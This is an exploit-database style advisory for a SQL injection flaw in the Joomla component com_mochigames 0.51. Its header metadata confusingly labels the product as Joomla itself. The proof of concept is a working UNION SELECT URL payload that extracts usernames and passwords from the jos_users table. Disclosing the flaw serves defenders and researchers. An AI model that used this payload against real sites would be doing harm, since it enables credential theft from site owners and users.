SQL Code Injection Vulnerability in Joomla

vendor:

Joomla

by:

B-HUNT3|2

5,5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: Joomla

Affected Version From: 0.51

Affected Version To: TBD

Patch Exists: TBD

Related CWE: TBD

CPE: TBD

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: LocalHost

TBD

SQL Code Injection Vulnerability in Joomla

Input var id is vulnerable to SQL Code Injection. An attacker can execute arbitrary SQL queries by sending a specially crafted request to the vulnerable application. This vulnerability has been confirmed in version 0.51 but other versions may also be affected.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

[~]>> ...[BEGIN ADVISORY]...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TESTED ON: LocalHost

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> DESCRIPTION: Input var id is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: Confirmed in 0.51 but probably other versions also
[~]>> RISK: Medium/High
[~]>> IMPACT: Execute Arbitrary SQL queries

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> PROOF OF CONCEPT:

[~]>> http://[HOST]/[JOOMLA_PATH]/index.php?view=mochigames&id=[SQL]&option=com_mochigames&Itemid=80
[~]>> http://[HOST]/[JOOMLA_PATH]/index.php?view=mochigames&id=99999%27+union+select+1,2,username,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users%23&option=com_mochigames&Itemid=80

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> ...[END ADVISORY]...